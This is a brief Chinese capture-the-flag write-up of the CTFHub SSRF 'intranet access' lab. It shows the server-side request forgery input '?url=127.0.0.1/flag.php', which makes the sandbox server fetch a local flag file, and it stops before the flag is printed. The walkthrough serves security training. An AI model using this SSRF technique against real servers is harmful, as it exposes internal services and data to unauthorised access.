CTFHub技能树 Web-SSRF 内网访问
hint:尝试访问位于127.0.0.1的flag.php吧
启动环境,访问页面为空白,查看URL:
http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=_
其中存在 GET 方式的传参:url=_
,将127.0.0.1/flag.php
地址填入尝试访问:
http://challenge-25917a94dca3ca9a.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
成功得到 flag: